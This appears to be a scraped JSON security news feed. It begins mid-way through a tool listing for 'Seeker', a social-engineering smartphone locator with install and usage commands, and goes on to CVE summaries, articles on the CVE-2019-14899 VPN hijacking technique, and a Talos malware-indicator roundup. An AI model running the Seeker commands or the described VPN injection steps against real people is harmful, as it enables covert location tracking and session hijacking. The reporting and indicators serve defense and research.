\n\n** Note ** : On iPhone due to some reason location accuracy is approximately 65 meters. \n \n** Templates ** \nYou can choose a template which will be used by seeker from these : \n\n\n * NearYou \n * Google Drive (Suggested by @Akaal_no_one) \n \n** Tested On : ** \n\n\n * Kali Linux 2019.2 \n * BlackArch Linux \n * Ubuntu 19.04 \n * Kali Nethunter \n * Termux \n * Parrot OS \n \n** Installation ** \n \n** Kali Linux / Ubuntu / Parrot OS ** \n\n \n \n git clone https://github.com/thewhiteh4t/seeker.git\n cd seeker/\n chmod 777 install.sh\n ./install.sh\n\n \n** BlackArch Linux ** \n\n \n \n pacman -S seeker\n\n \n** Docker ** \n\n \n \n docker pull thewhiteh4t/seeker\n\n \n** Termux ** \n\n \n \n git clone https://github.com/thewhiteh4t/seeker.git\n cd seeker/\n chmod 777 termux_install.sh\n ./termux_install.sh\n\n \n** Usage ** \n\n \n \n python3 seeker.py -h\n \n usage: seeker.py [-h] [-s SUBDOMAIN]\n \n optional arguments:\n -h, --help show this help message and exit\n -s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )\n -k KML, --kml KML Provide KML Filename ( Optional )\n -t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]\n \n # Example\n \n # SERVEO \n ########\n python3 seeker.py\n \n # NGROK ETC.\n ############\n \n # In First Terminal Start seeker in Manual mode like this\n python3 seeker.py -t manual\n \n # In Second Terminal Start Ngrok or any other tunnel service on port 8080\n ./ngrok http 8080\n \n #-----------------------------------#\n \n # Subdomain\n ########### \n python3 seeker.py --subdomain google\n python3 seeker.py -- tunnel manual --subdomain zomato\n \n #-----------------------------------#\n \n # Docker Usage\n ##############\n \n # SERVEO\n ########\n docker run -t --rm thewhiteh4t/seeker\n \n # NGROK\n #######\n \n # Step 1\n docker network create ngroknet\n \n # Step 2\n docker run --rm -t --net ngroknet --name seeker thewhiteh4t/seeker python3 seeker.py -t manual\n \n # Step 3\n docker run --rm 
-t --net ngroknet --name ngrok wernight/ngrok ngrok http seeker:8080\n\n \n** Known Problems ** \n\n\n * Services like Serveo and Ngrok are banned in some countries such as Russia etc., so if it's banned in your country you may not get a URL; if it is not banned, first READ CLOSED ISSUES, and if your problem is not listed, create a new issue. \n \n** Demo ** \n\n\n \n\n\n \n \n\n\n** [ Download Seeker ](<https://github.com/thewhiteh4t/seeker> \"Download Seeker\" ) **\n", "modified": "2019-12-06T11:00:03", "published": "2019-12-06T11:00:03", "id": "KITPLOIT:4428111869942471510", "href": "http://www.kitploit.com/2019/12/seeker-v121-accurately-locate.html", "title": "Seeker v1.2.1 - Accurately Locate Smartphones Using Social Engineering", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "pentestit": [{"lastseen": "2019-12-07T02:00:40", "bulletinFamily": "blog", "description": "TrevorC2 version 1.3 was just released yesterday! I briefly mentioned TrevorC2 in my older post titled the List of Open Source C2 Post-Exploitation Frameworks. In fact, there have been two updates which I missed blogging about and hence, this post will cover those changes as well. What is TrevorC2? TrevorC2 is an open source client/server model for masking command and control through a...\n\n[Source](<http://pentestit.com/update-trevorc2-version-1-3/>)", "modified": "2019-12-06T23:39:09", "published": "2019-12-06T23:39:09", "id": "PENTESTIT:C07434AD14CDB0290959D901963FBA09", "href": "http://pentestit.com/update-trevorc2-version-1-3/", "type": "pentestit", "title": "UPDATE: TrevorC2 version 1.3", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-12-07T12:53:51", "bulletinFamily": "NVD", "description": "In device_class_to_int of device_class.cc, there is a possible out of bounds read due to improper casting. This could lead to local information disclosure in the Bluetooth server with User execution privileges needed. 
User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-140152619", "modified": "2019-12-07T03:04:00", "id": "CVE-2019-2226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-2226", "published": "2019-12-06T23:15:00", "title": "CVE-2019-2226", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T12:53:48", "bulletinFamily": "NVD", "description": "Insufficient checks in the finite state machine of the ShapeShift KeepKey hardware wallet before firmware 6.2.2 allow a partial reset of cryptographic secrets to known values via crafted messages. Notably, this breaks the security of U2F for new server registrations and invalidates existing registrations. This vulnerability can be exploited by unauthenticated attackers and the interface is reachable via WebUSB.", "modified": "2019-12-06T19:03:00", "id": "CVE-2019-18672", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18672", "published": "2019-12-06T18:15:00", "title": "CVE-2019-18672", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T11:53:43", "bulletinFamily": "NVD", "description": "beegfs-ctl in ThinkParQ BeeGFS through 7.1.3 allows Authentication Bypass via communication with a BeeGFS metadata server (which is typically not exposed to external networks).", "modified": "2019-12-05T16:27:00", "id": "CVE-2019-15897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-15897", "published": "2019-12-05T16:15:00", "title": "CVE-2019-15897", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2019-12-06T17:02:13", "bulletinFamily": "info", "description": "A vulnerability in most Linux distros has been uncovered that allows a network-adjacent attacker to hijack VPN connections and inject rogue data into the secure tunnels that victims are using to communicate with remote servers.\n\nAccording to 
researchers at University of New Mexico and Breakpointing Bad, the bug (CVE-2019-14899), \u201callows\u2026an attacker to determine if\u2026a user is connected to a VPN, the virtual IP address they have been assigned by the VPN server, and whether or not there is an active connection to a given website.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn [an advisory](<https://seclists.org/oss-sec/2019/q4/122>) released this week, they noted that once a proof-of-concept exploit allowed them to determine a VPN client\u2019s virtual IP address and make inferences about active connections, they were then able to use encrypted replies to unsolicited packets to determine the sequence and acknowledgment numbers of connections. These allowed them to hijack TCP sessions and inject data into the TCP stream.\n\n## Anatomy of an Attack\n\nAn attack would require convincing a user to connect to a rogue wireless access point (or other internet connection) under the adversary\u2019s control (imagine a coffee shop scenario, for instance). The attacker can then start scanning devices connected to the access point for active VPN sessions.\n\nTo do this, the access point can send SYN-ACK packets to any connected devices, canvassing across the entire virtual IP space. When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker. 
An automated script would presumably make this process painless for the adversary.\n\nOnce the attacker determines that the user has an active TCP connection to an external server, the next step is to sniff out the next sequence number and in-window acknowledgment number needed to inject forged packets into the connection.\n\nTo find the appropriate sequence and ACK numbers, the attacker can continually spoof reset packets into the active connection until it sniffs challenge ACKs.\n\n\u201cThe victim\u2019s device will trigger a TCP challenge ACK on each reset it receives that has an in-window sequence number for an existing connection,\u201d according to the advisory. \u201cFor example, if the client is using OpenVPN to exchange encrypted packets with the VPN server, then the client will always respond with an SSL packet of length 79 when a challenge ACK is triggered.\u201d\n\nContinuing with packet-spoofing and challenge ACK analysis (detailed in the advisory), an attacker can infer the rest of the information needed to inject arbitrary payloads into the victim\u2019s active VPN session.\n\n## Affected OS and VPNs\n\nThe bug affects macOS, iOS and Android, most Linux distributions including Ubuntu, Fedora and Debian, as well as Unix-like OS such as FreeBSD and OpenBSD. At particular risk are those Linux distros that use a version of systemd pulled after November 28 of last year, which turned reverse path filtering off, researchers warned. 
The IPv4 version of CentOS has been confirmed as unaffected.\n\nAs for VPN technology, researchers found that a proof-of-concept exploit works against OpenVPN, WireGuard and IKEv2/IPSec, and they\u2019re in the process of testing Tor.\n\n\u201cThe VPN technology used does not seem to matter and we are able to make all of our inferences even though the responses from the victim are encrypted, using the size of the packets and number of packets sent (in the case of challenge ACKs, for example) to determine what kind of packets are being sent through the encrypted VPN tunnel,\u201d according to the advisory.\n\nThe bug has been reported to distros and the Linux kernel security team, as well as to others impacted such as Systemd, Google, Apple, OpenVPN, and WireGuard.\n\n\u201cAdding a prerouting rule to drop packets destined for the client\u2019s virtual IP address is an effective [mitigation] on some systems,\u201d according to the advisory. \u201cThere are other potential solutions being considered by the kernel maintainers, but I can\u2019t speak to their current status.\u201d\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. 
_**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-06T16:54:02", "published": "2019-12-06T16:54:02", "id": "THREATPOST:C90531BC1E0B38F400111112E4CBEF3A", "href": "https://threatpost.com/linux-bug-vpns-hijacking/150891/", "type": "threatpost", "title": "Linux Bug Opens Most VPNs to Hijacking", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2019-12-06T12:33:52", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-WMkBOTVhvWY/Xeo0rDTtwyI/AAAAAAAA17s/FVhvLMEY1qs7YWBRRvq_YhwWs1uqQpxjwCLcBGAsYHQ/s728-e100/linux-vpn-hacking.jpg>)\n\nA team of cybersecurity researchers has disclosed a new severe vulnerability affecting most Linux and Unix-like operating systems, including FreeBSD, OpenBSD, macOS, iOS, and Android, that could allow remote 'network adjacent attackers' to spy on and tamper with encrypted VPN connections. \n \nThe vulnerability, tracked as CVE-2019-14899, resides in the networking stack of various operating systems and can be exploited against both IPv4 and IPv6 TCP streams. \n \nSince the vulnerability does not rely on the VPN technology used, the attack works against widely implemented virtual private network protocols like OpenVPN, WireGuard, IKEv2/IPSec, and more, the researchers confirmed. \n\n\n \nThis vulnerability can be exploited by a network attacker \u2014 controlling an access point or connected to the victim's network \u2014 just by sending unsolicited network packets to a targeted device and observing replies, even if they are encrypted. 
\n \nAs explained by the researchers, though there are variations for each of the impacted operating systems, the vulnerability allows attackers to: \n \n\n\n * determine the virtual IP address of a victim assigned by the VPN server,\n * determine if there is an active connection to a given website,\n * determine the exact seq and ack numbers by counting encrypted packets and/or examining their size, and\n * inject data into the TCP stream and hijack connections.\n \n\n\n> \"The access point can then determine the virtual IP of the victim by sending SYN-ACK packets to the victim device across the entire virtual IP space,\" the team said in its [advisory](<https://seclists.org/oss-sec/2019/q4/122>).\n\n \n\n\n> \"When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds with a RST; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker.\"\n\n \nWhile explaining variations in the behavior of different operating systems, as an example, researchers said the attack does not work against macOS/iOS devices as described. \n \nInstead, an attacker needs to \"use an open port on the Apple machine to determine the virtual IP address.\" In their testing, the researchers use \"port 5223, which is used for iCloud, iMessage, FaceTime, Game Center, Photo Stream, and push notifications, etc.\" \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nThe researchers tested and successfully exploited the vulnerability against the following operating systems and the init systems, but they believe this list could go long as researchers test the flaw on more systems. 
\n \n\n\n * Ubuntu 19.10 (systemd)\n * Fedora (systemd)\n * Debian 10.2 (systemd)\n * Arch 2019.05 (systemd)\n * Manjaro 18.1.1 (systemd)\n * Devuan (sysV init)\n * MX Linux 19 (Mepis+antiX)\n * Void Linux (runit)\n * Slackware 14.2 (rc.d) \n * Deepin (rc.d)\n * FreeBSD (rc.d) \n * OpenBSD (rc.d)\n \n\"Most of the Linux distributions we tested were vulnerable, especially Linux distributions that use a version of systemd pulled after November 28th of last year, which turned reverse path filtering off,\" the researchers said. \n \n\"However, we recently discovered that the attack also works against IPv6, so turning reverse path filtering on isn't a reasonable solution.\" \n \nAs possible mitigation, researchers suggested to turn on reverse path filtering, implement bogon filtering, and encrypt packet size and timing to prevent attackers from making any inference. \n \nWhile the researchers have not yet revealed technical details of the vulnerability, they are planning to publish an in-depth analysis of this flaw and its related implications, after affected vendors, including Systemd, Google, Apple, OpenVPN, WireGuard, and different Linux distros issue satisfactory workarounds and patches.\n", "modified": "2019-12-06T11:26:06", "published": "2019-12-06T11:02:00", "id": "THN:FD10C34E4C222666AC0DBB5533C900AF", "href": "https://thehackernews.com/2019/12/linux-vpn-hacking.html", "type": "thn", "title": "New Linux Bug Lets Attackers Hijack Encrypted VPN Connections", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-12-06T20:48:42", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 29 and Dec. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. 
Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2019/12/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.NetWire-7428720-1 | Malware | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Ransomware.Cerber-7419509-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. 
Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Trojan.LokiBot-7420275-1 | Trojan | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents attached to spam emails. \nWin.Dropper.Gh0stRAT-7414189-0 | Dropper | Gh0stRAT is a well-known family of RATs designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Trojan.Zbot-7414153-0 | Trojan | Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. \nDoc.Downloader.Emotet-7413880-1 | Downloader | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. \nWin.Dropper.Tofsee-7431752-0 | Dropper | Tofsee is multi-purpose malware that features several modules that send spam messages, conduct click fraud, mine cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Downloader.Phorpiex-7428338-0 | Downloader | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. 
Phorpiex has been known to drop a wide range of payloads, from malware to send spam emails to ransomware and cryptocurrency miners. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.NetWire-7428720-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 14 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 14 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HKLM ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{136PK353-UF88-3GCY-ILP2-6AY4D4SNW644} \nValue Name: StubPath ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\<random guid>` | 16 \n`imDfesUY` | 13 \n`xtWSWREb` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`cobroserfinansa[.]com` | 14 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Install` | 15 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 15 \n`%APPDATA%\\Install\\winlogon.exe` | 14 \n`%TEMP%\\7176.dmp` | 1 \n`%APPDATA%\\Install\\MServicesNet.exe` | 1 \n`%TEMP%\\7134_appcompat.txt` | 1 \n \n#### File Hashes\n\n` 038157ed389233fc4aae039df0806789f2c92b6e3947f36bc8f086ae16a7fd4e 182dadc51371a709b901f1de489a52ff7295749427a8cf9d112358a605e2ed6d 33d4c44c967c9ab53f3d04b0d11ac38f9fbc3f9d16e65cca170bd8c937589038 3cf7e6a7776e15f8c01bde5788e5e7dbbe25beb37e977abe38b3b4cb256c3ec3 527ff73f2e6d99bbcc7fa02804ab7380e2fe12689b70bb1b0840ac1b02331a93 5aa45dcf729d53a3fc6e5d02980835fe78f3f7b7ae262b8aebf2edb6abb59bc4 5f86aa7181604fadc92f1a976fdfff892cd9b515e59939d93941907a35762888 6485a616654adee2d573a983c687a8d8ea3d126dfbf86df3a065c5e7846bd57b 7746199aba6ad47bf92515db686f3a5e2accbdb2b7f480ac2af1e2c5c377a8eb 79aa89119d9e26dc366a7af72d47c323168d2ad881bca31e9075a41f5ce081f2 905b2347215e7ce0f02f8e7274941982c56c1b817fbfd4b9eaf97d2a65f6146d 91856d29ac1f9720917a40e5533c7dacf528b25acfb5a82a00f6882b053c9b5a b18a45a4345f442efcc02d6efb9110b9e35bb98fac4613c83a39fecbee78aaa4 d26438798f502364eea85bbf2804165d0709b90833ddf4512f95ac77f881edaf de8be762d85eb4014992a174acd115de70b89884d21933d7e972e6d4972904fe def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa e0acbefe824d29143e303ba8596d1436150bf1ad7ec533b56e4ae2b1bafcf07f ea34a08deaac08c7f79e6cd2e94a74ad5b0c95dec43f81e0a218d957088b8f10 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-A71_xnIISqo/XeqM2bcnfDI/AAAAAAAAC8U/10U7Bp8vnh0OPPzEdrzVimUVUDijT6k9ACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mO63cFGuGWk/XeqM6B4wP5I/AAAAAAAAC8Y/D0XOfx3jnZkD7QkmWbImdcnFLyc1XagjACLcBGAsYHQ/s1600/def9d601134017c678cbd058f41b4ad7d3dd8d2c8ef1eef01a9a17ebf38ea6fa_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7419509-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 12 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 12 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_01 ` | 12 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} \nValue Name: Component_00 ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: dnscacheugc ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: javaw ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue 
Name: vssadmin ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: TCPSVCS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: lodctr ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: instnm ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: bootcfg ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ctfmon ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 12 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`216[.]239[.]36[.]21` | 3 \n`216[.]239[.]34[.]21` | 2 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 12 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 12 \n`%System32%\\Tasks\\dnscacheugc` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\dnscacheugc.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\dnscacheugc.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\bootcfg.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\bootcfg.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vssadmin.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\vssadmin.exe` | 1 \n`%System32%\\Tasks\\vssadmin` | 1 \n`%System32%\\Tasks\\bootcfg` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ctfmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ctfmon.exe` | 1 \n`%System32%\\Tasks\\ctfmon` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\resmon.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\resmon.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\newdev.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\newdev.exe` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\mfpmp.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\mfpmp.exe` | 1 \n`%System32%\\Tasks\\javaw` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\javaw.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\javaw.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\TCPSVCS.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\TCPSVCS.EXE` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0e1509af88618c8cb273196c4213e26c2219c3a1fba9ed8c51a22d871e316ccc 1d07399e5b31727fc4dadba07d062f7eff6864e33f17fb1a65f71b9b41b61282 
34a0f0bc799b5fd0cf9a89bce7d2ca2da158cf22940212b5c09fb1ec64bc9b65 4a60b63273210c8ebc4e6d07fba9b331011f852f4f5c1b5b1ae7ab5aa7df0f03 8a6c828f54dc34e260698e0347cce9e62d8fbc773e265c39c63e812201533724 8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5 b590d46794fad9c62040ce7941cf775282d1939c45267ec955e9be6ee8dd092a b8058ef9c3394ce2ea9318b06d6cf01080a0ad4ce87ee1cff78e57373192603e bbd6aadc606953b27f5592a2da7909949616b81b4f767ded89119644a71d2dd7 c8af6329fcfdfd4f9df33f2f4f59fb958e2416eebe8d78ab1444e763cf04d08c ce2b0b2037810060edbf86fc7ac78c5e0d4771b79181e39718498b02195e3642 efda569c35853456630d1e2fa27973aeb6386338f163ca0f60e3fbb4643a5b87 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Lx6S7pKbz6Q/XeqOUZ3VHqI/AAAAAAAAC8o/cyN6FoqfhAgw5jQiPi349NHl0DvQpTvrwCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KERDNEosGOE/XeqOYBMYHHI/AAAAAAAAC8s/j8nmlt4BEZs4Bg_I5zMSYeV7w9qtOb8twCLcBGAsYHQ/s1600/8aeadd92f66576dfd9b60ba352a7a61f43da7112eb127c28c5ceb54fb5e7b4c5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.LokiBot-7420275-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS ` | 17 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\SETTINGS\\LEAKDIAGNOSISATTEMPTED ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\QUOTATION.EXE \nValue Name: LastDetectionTime ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\QUOTATION\\OPTIONS ` | 2 
